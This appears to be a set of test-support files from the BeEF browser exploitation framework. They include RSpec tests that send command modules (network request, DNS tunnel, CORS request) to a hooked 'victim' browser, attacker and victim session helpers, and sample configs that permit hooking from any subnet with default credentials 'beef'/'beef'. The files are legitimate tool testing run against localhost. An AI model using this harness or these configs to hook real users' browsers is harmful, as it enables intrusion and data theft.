@debug_mod_names_ids['Test_return_image'] response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", {}.to_json, content_type: :json result_data = JSON.parse(response.body) expect(result_data['success']).to eq 'true' rescue StandardError => e print_info "Exception: #{e}" print_info "Exception Class: #{e.class}" print_info "Exception Message: #{e.message}" print_info "Exception Stack Trace: #{e.backtrace}" if @driver.execute_script('return window.beef.session.get_hook_session_id().length').nil? exit 1 else exit 0 end end it 'The Test HTTP Redirect command module successfully executes' do cmd_mod_id = @debug_mod_names_ids['Test_http_redirect'] response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", {}.to_json, content_type: :json result_data = JSON.parse(response.body) expect(result_data['success']).to eq 'true' rescue StandardError => e print_info "Exception: #{e}" print_info "Exception Class: #{e.class}" print_info "Exception Message: #{e.message}" print_info "Exception Stack Trace: #{e.backtrace}" if @driver.execute_script('return window.beef.session.get_hook_session_id().length').nil? exit 1 else exit 0 end end it 'The Test Returning Results/Long String command module successfully executes' do cmd_mod_id = @debug_mod_names_ids['Test_return_long_string'] response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { "repeat": 20, "repeat_string": 'beef' }.to_json, content_type: :json result_data = JSON.parse(response.body) expect(result_data['success']).to eq 'true' rescue StandardError => e print_info "Exception: #{e}" print_info "Exception Class: #{e.class}" print_info "Exception Message: #{e.message}" print_info "Exception Stack Trace: #{e.backtrace}" print_info "Exception Message: #{e.backtrace}" if @driver.execute_script('return window.beef.session.get_hook_session_id().length').nil? exit 1 else exit 0 end end it 'The Test Network Request command module successfully executes' do cmd_mod_id = @debug_mod_names_ids['Test_network_request'] response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { "scheme": 'http', "method": 'GET', "domain": ATTACK_DOMAIN.to_s, "port": @config.get('beef.http.port').to_s, "path": '/hook.js', "anchor": 'anchor', "data": 'query=testquerydata', "timeout": '10', "dataType": 'script' }.to_json, content_type: :json result_data = JSON.parse(response.body) expect(result_data['success']).to eq 'true' rescue StandardError => e print_info "Exception: #{e}" print_info "Exception Class: #{e.class}" print_info "Exception Message: #{e.message}" print_info "Exception Stack Trace: #{e.backtrace}" if @driver.execute_script('return window.beef.session.get_hook_session_id().length').nil? exit 1 else exit 0 end end it 'The Test DNS Tunnel command module successfully executes' do cmd_mod_id = @debug_mod_names_ids['Test_dns_tunnel_client'] response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { "domain": 'example.com', "data": 'Lorem ipsum' }.to_json, content_type: :json result_data = JSON.parse(response.body) expect(result_data['success']).to eq 'true' rescue StandardError => e print_info "Exception: #{e}" print_info "Exception Class: #{e.class}" print_info "Exception Message: #{e.message}" print_info "Exception Stack Trace: #{e.backtrace}" if @driver.execute_script('return window.beef.session.get_hook_session_id().length').nil? exit 1 else exit 0 end end it 'The Test CORS Request command module successfully executes' do cmd_mod_id = @debug_mod_names_ids['Test_cors_request'] response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { "method": 'GET', "url": 'example.com', "data": { "test": 'data' } }.to_json, content_type: :json result_data = JSON.parse(response.body) expect(result_data['success']).to eq 'true' rescue StandardError => e print_info "Exception: #{e}" print_info "Exception Class: #{e.class}" print_info "Exception Message: #{e.message}" print_info "Exception Stack Trace: #{e.backtrace}" if @driver.execute_script('return window.beef.session.get_hook_session_id().length').nil? exit 1 else exit 0 end end end
Ruby
beef/spec/support/beef_test.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # require 'test/unit' require 'capybara' require 'capybara/rspec' Capybara.run_server = false # we need to run our own BeEF server require 'selenium-webdriver' class BeefTest def self.save_screenshot(session) Dir.mkdir(BEEF_TEST_DIR) unless File.directory?(BEEF_TEST_DIR) session.driver.browser.save_screenshot(BEEF_TEST_DIR + Time.now.strftime('%Y-%m-%d--%H-%M-%S-%N') + '.png') end def self.login(session = nil) session = Capybara::Session.new(:selenium_headless) if session.nil? session.visit(ATTACK_URL) sleep 2.0 session.has_content?('BeEF Authentication') session.fill_in 'user', with: BEEF_USER session.fill_in 'pass', with: BEEF_PASSWD session.click_button('Login') sleep 10.0 session end def self.logout(session) session.click_link('Logout') session end def self.new_attacker self.login end def self.new_victim victim = Capybara::Session.new(:selenium_headless) victim.visit(VICTIM_URL) victim end end
Ruby
beef/spec/support/constants.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # BEEF_TEST_DIR = '/tmp/beef-test/'.freeze # General constants ATTACK_DOMAIN = 'localhost'.freeze VICTIM_DOMAIN = '127.0.0.1'.freeze ATTACK_URL = 'http://' + ATTACK_DOMAIN + ':3000/ui/panel' VICTIM_URL = 'http://' + VICTIM_DOMAIN + ':3000/demos/basic.html' # Credentials BEEF_USER = ENV['TEST_BEEF_USER'] || 'beef' BEEF_PASSWD = ENV['TEST_BEEF_PASS'] || 'beef' # RESTful API root endpoints RESTAPI_HOOKS = 'http://' + ATTACK_DOMAIN + ':3000/api/hooks' RESTAPI_LOGS = 'http://' + ATTACK_DOMAIN + ':3000/api/logs' RESTAPI_MODULES = 'http://' + ATTACK_DOMAIN + ':3000/api/modules' RESTAPI_NETWORK = 'http://' + ATTACK_DOMAIN + ':3000/api/network' RESTAPI_PROXY = 'http://' + ATTACK_DOMAIN + ':3000/api/proxy' RESTAPI_DNS = 'http://' + ATTACK_DOMAIN + ':3000/api/dns' RESTAPI_SENG = 'http://' + ATTACK_DOMAIN + ':3000/api/seng' RESTAPI_ADMIN = 'http://' + ATTACK_DOMAIN + ':3000/api/admin' RESTAPI_WEBRTC = 'http://' + ATTACK_DOMAIN + ':3000/api/webrtc' RESTAPI_REQUESTER = 'http://' + ATTACK_DOMAIN + ':3000/api/requester'
Ruby
beef/spec/support/simple_rest_client.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # less noisy verson of BeeRestAPI found in tools. class BeefRestClient def initialize(proto, host, port, user, pass) @user = user @pass = pass @url = "#{proto}://#{host}:#{port}/api/" @token = nil end def is_pass?(passwd) @pass == passwd end def auth response = RestClient.post "#{@url}admin/login", { 'username': "#{@user}", 'password': "#{@pass}" }.to_json, content_type: :json, accept: :json result = JSON.parse(response.body) @token = result['token'] { success: result['success'], payload: result, token: @token } rescue StandardError => e { success: false, payload: e.message } end def version return { success: false, payload: 'no token' } if @token.nil? begin response = RestClient.get "#{@url}server/version", { params: { token: @token } } result = JSON.parse(response.body) { success: result['success'], payload: result } rescue StandardError => e print_error "Could not retrieve BeEF version: #{e.message}" { success: false, payload: e.message } end end end
YAML
beef/spec/support/assets/config_new.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # BeEF Configuration file beef: version: '0.5.1.0' # More verbose messages (server-side) debug: false # More verbose messages (client-side) client_debug: false # Used for generating secure tokens crypto_default_value_length: 80 # Credentials to authenticate in BeEF. # Used by both the RESTful API and the Admin interface credentials: user: "beef" passwd: "beef" # Interface / IP restrictions restrictions: # subnet of IP addresses that can hook to the framework permitted_hooking_subnet: ["0.0.0.0/0", "::/0"] # subnet of IP addresses that can connect to the admin UI #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"] permitted_ui_subnet: ["0.0.0.0/0", "::/0"] # subnet of IP addresses that cannot be hooked by the framework excluded_hooking_subnet: [] # slow API calls to 1 every api_attempt_delay seconds api_attempt_delay: "0.05" # HTTP server http: debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace. host: "0.0.0.0" port: "3000" # Decrease this setting to 1,000 (ms) if you want more responsiveness # when sending modules and retrieving results. # NOTE: A poll timeout of less than 5,000 (ms) might impact performance # when hooking lots of browsers (50+). # Enabling WebSockets is generally better (beef.websocket.enable) xhr_poll_timeout: 1000 # Host Name / Domain Name # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS), # set the public hostname below: #public: "" # public hostname/IP address # Reverse Proxy / NAT # If you want BeEF to be accessible behind a reverse proxy or NAT, # set both the publicly accessible hostname/IP address and port below: # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed # by altering the X-FORWARDED-FOR ip address in the request header. allow_reverse_proxy: false # Public settings # These settings will be used to create a public facing URL # This public facing URL will be used for all hook related calls public: host: "example.com" port: 443 https: true # public hostname/IP address #public_port: "" # public port (experimental) # Hook hook_file: "/hook.js" hook_session_name: "BEEFHOOK" # Allow one or multiple origins to access the RESTful API using CORS # For multiple origins use: "http://browserhacker.com, http://domain2.com" restful_api: allow_cors: false cors_allowed_domains: "http://browserhacker.com" # Prefer WebSockets over XHR-polling when possible. websocket: enable: false port: 61985 # WS: good success rate through proxies # Use encrypted 'WebSocketSecure' # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF secure: true secure_port: 61986 # WSSecure ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header) web_server_imitation: enable: true type: "apache" # Supported: apache, iis, nginx hook_404: false # inject BeEF hook in HTTP 404 responses hook_root: false # inject BeEF hook in the server home page # Experimental HTTPS support for the hook / admin / all other Thin managed web services https: enable: false # Enabled this config setting if you're external facing uri is using https public_enabled: false # In production environments, be sure to use a valid certificate signed for the value # used in beef.http.public (the domain name of the server where you run BeEF) key: "beef_key.pem" cert: "beef_cert.pem" database: file: "beef.db" # Autorun Rule Engine autorun: # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually # continue execution regardless of results. # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout. result_poll_interval: 300 result_poll_timeout: 5000 # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain. # This is useful to call modules (nested-forward chain mode) that are not returning their status/results. continue_after_timeout: true # Enables DNS lookups on zombie IP addresses dns_hostname_lookup: false # IP Geolocation # NOTE: requires MaxMind database. Run ./updated-geoipdb to install. geoip: enable: true database: '/opt/GeoIP/GeoLite2-City.mmdb' # You may override default extension configuration parameters here # Note: additional experimental extensions are available in the 'extensions' directory # and can be enabled via their respective 'config.yaml' file extension: admin_ui: enable: true base_path: "/ui" demos: enable: true events: enable: true evasion: enable: false requester: enable: true proxy: enable: true network: enable: true metasploit: enable: false social_engineering: enable: true xssrays: enable: true
YAML
beef/spec/support/assets/config_old.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # BeEF Configuration file beef: version: '0.5.1.0' # More verbose messages (server-side) debug: false # More verbose messages (client-side) client_debug: false # Used for generating secure tokens crypto_default_value_length: 80 # Credentials to authenticate in BeEF. # Used by both the RESTful API and the Admin interface credentials: user: "beef" passwd: "beef" # Interface / IP restrictions restrictions: # subnet of IP addresses that can hook to the framework permitted_hooking_subnet: ["0.0.0.0/0", "::/0"] # subnet of IP addresses that can connect to the admin UI #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"] permitted_ui_subnet: ["0.0.0.0/0", "::/0"] # subnet of IP addresses that cannot be hooked by the framework excluded_hooking_subnet: [] # slow API calls to 1 every api_attempt_delay seconds api_attempt_delay: "0.05" # HTTP server http: debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace. host: "0.0.0.0" port: "3000" # Decrease this setting to 1,000 (ms) if you want more responsiveness # when sending modules and retrieving results. # NOTE: A poll timeout of less than 5,000 (ms) might impact performance # when hooking lots of browsers (50+). # Enabling WebSockets is generally better (beef.websocket.enable) xhr_poll_timeout: 1000 # Host Name / Domain Name # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS), # set the public hostname below: #public: "" # public hostname/IP address # Reverse Proxy / NAT # If you want BeEF to be accessible behind a reverse proxy or NAT, # set both the publicly accessible hostname/IP address and port below: # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed # by altering the X-FORWARDED-FOR ip address in the request header. allow_reverse_proxy: false #public: "example" # public hostname/IP address #public_port: "" # public port (experimental) # Hook hook_file: "/hook.js" hook_session_name: "BEEFHOOK" # Allow one or multiple origins to access the RESTful API using CORS # For multiple origins use: "http://browserhacker.com, http://domain2.com" restful_api: allow_cors: false cors_allowed_domains: "http://browserhacker.com" # Prefer WebSockets over XHR-polling when possible. websocket: enable: false port: 61985 # WS: good success rate through proxies # Use encrypted 'WebSocketSecure' # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF secure: true secure_port: 61986 # WSSecure ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header) web_server_imitation: enable: true type: "apache" # Supported: apache, iis, nginx hook_404: false # inject BeEF hook in HTTP 404 responses hook_root: false # inject BeEF hook in the server home page # Experimental HTTPS support for the hook / admin / all other Thin managed web services https: enable: false # Enabled this config setting if you're external facing uri is using https public_enabled: false # In production environments, be sure to use a valid certificate signed for the value # used in beef.http.public (the domain name of the server where you run BeEF) key: "beef_key.pem" cert: "beef_cert.pem" database: file: "beef.db" # Autorun Rule Engine autorun: # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually # continue execution regardless of results. # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout. result_poll_interval: 300 result_poll_timeout: 5000 # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain. # This is useful to call modules (nested-forward chain mode) that are not returning their status/results. continue_after_timeout: true # Enables DNS lookups on zombie IP addresses dns_hostname_lookup: false # IP Geolocation # NOTE: requires MaxMind database. Run ./updated-geoipdb to install. geoip: enable: true database: '/opt/GeoIP/GeoLite2-City.mmdb' # You may override default extension configuration parameters here # Note: additional experimental extensions are available in the 'extensions' directory # and can be enabled via their respective 'config.yaml' file extension: admin_ui: enable: true base_path: "/ui" demos: enable: true events: enable: true evasion: enable: false requester: enable: true proxy: enable: true network: enable: true metasploit: enable: false social_engineering: enable: true xssrays: enable: true
YAML
beef/spec/support/browserstack/osx/catalina/catalina_chrome_41.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "OSX Catalina Chrome 41" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "chrome" "browser_version": "41.0" "os": "osx" "os_version": "catalina"
YAML
beef/spec/support/browserstack/osx/catalina/catalina_chrome_59.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "OSX Catalina Chrome 59" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "chrome" "browser_version": "59.0" "os": "osx" "os_version": "catalina"
YAML
beef/spec/support/browserstack/osx/catalina/catalina_chrome_81.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "OSX Catalina Chrome 81" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "chrome" "browser_version": "81.0" "os": "osx" "os_version": "catalina"
YAML
beef/spec/support/browserstack/osx/catalina/catalina_firefox_11.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "OSX Catalina Firefox 11" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "firefox" "browser_version": "11.0" "os": "osx" "os_version": "catalina"
YAML
beef/spec/support/browserstack/osx/catalina/catalina_firefox_68esr.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "OSX Catalina Firefox 68 ESR" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "firefox" "browser_version": "68.0" "os": "osx" "os_version": "catalina"
YAML
beef/spec/support/browserstack/osx/catalina/catalina_firefox_75.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "OSX Catalina Firefox 75" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "firefox" "browser_version": "75.0" "os": "osx" "os_version": "catalina"
YAML
beef/spec/support/browserstack/osx/catalina/catalina_safari_13.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "OSX Catalina Safari 13" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "safari" "browser_version": "13.0" "os": "osx" "os_version": "catalina"
YAML
beef/spec/support/browserstack/osx/elcapitan/elcapitan_chrome_14.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "OSX El Capitan Chrome 14" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "chrome" "browser_version": "14.0" "os": "osx" "os_version": "el capitan"
YAML
beef/spec/support/browserstack/osx/elcapitan/elcapitan_chrome_81.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "OSX El Capitan Chrome 81" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "chrome" "browser_version": "81.0" "os": "osx" "os_version": "el capitan"
YAML
beef/spec/support/browserstack/osx/elcapitan/elcapitan_firefox_7.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "OSX El Capitan Firefox 7" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "firefox" "browser_version": "7.0" "os": "osx" "os_version": "el capitan"
YAML
beef/spec/support/browserstack/osx/elcapitan/elcapitan_firefox_75.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "OSX El Capitan Firefox 75" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "firefox" "browser_version": "75.0" "os": "osx" "os_version": "el capitan"
YAML
beef/spec/support/browserstack/osx/elcapitan/elcapitan_safari_9-1.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "OSX El Capitan Safari 9.1" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "safari" "browser_version": "9.1" "os": "osx" "os_version": "el capitan" "browserstack.selenium_version": "3.5.2"
YAML
beef/spec/support/browserstack/osx/snowleopard/snowleopard_chrome_14.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "OSX Snow Leopard Chrome 14" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "chrome" "browser_version": "14.0" "os": "osx" "os_version": "Snow Leopard"
YAML
beef/spec/support/browserstack/osx/snowleopard/snowleopard_chrome_35.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "OSX Snow Leopard Chrome 35" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "chrome" "browser_version": "35.0" "os": "osx" "os_version": "snow leopard"
YAML
beef/spec/support/browserstack/osx/snowleopard/snowleopard_chrome_49.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "OSX Snow Leopard Chrome 49" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "chrome" "browser_version": "49.0" "os": "osx" "os_version": "snow leopard"
YAML
beef/spec/support/browserstack/osx/snowleopard/snowleopard_firefox_38esr.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "OSX Snow Leopard Firefox 38 ESR" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "firefox" "browser_version": "38.0" "os": "osx" "os_version": "snow leopard"
YAML
beef/spec/support/browserstack/osx/snowleopard/snowleopard_firefox_42.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "OSX Snow Leopard Firefox 42" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "firefox" "browser_version": "42.0" "os": "osx" "os_version": "snow leopard"
YAML
beef/spec/support/browserstack/osx/snowleopard/snowleopard_firefox_7.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "OSX Snow Leopard Firefox 7" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "firefox" "browser_version": "7.0" "os": "osx" "os_version": "snow leopard"
YAML
beef/spec/support/browserstack/osx/snowleopard/snowleopard_safari_5-1.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "OSX Snow Leopard Safari 5.1" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "safari" "browser_version": "5.1" "os": "osx" "os_version": "snow leopard"
YAML
beef/spec/support/browserstack/windows/win10/win10_chrome_37.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "Windows 10 Chrome 37" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "chrome" "browser_version": "37.0" "os": "windows" "os_version": "10"
YAML
beef/spec/support/browserstack/windows/win10/win10_chrome_59.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "Windows 10 Chrome 59" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "chrome" "browser_version": "59.0" "os": "windows" "os_version": "10"
YAML
beef/spec/support/browserstack/windows/win10/win10_chrome_81.config.yml
server: "hub-cloud.browserstack.com" common_caps: "build": "Windows 10 Chrome 81" "project": "BeEF" "browserstack.local": true "browserstack.video": false browser_caps: - "browser": "chrome" "browser_version": "81.0" "os": "windows" "os_version": "10"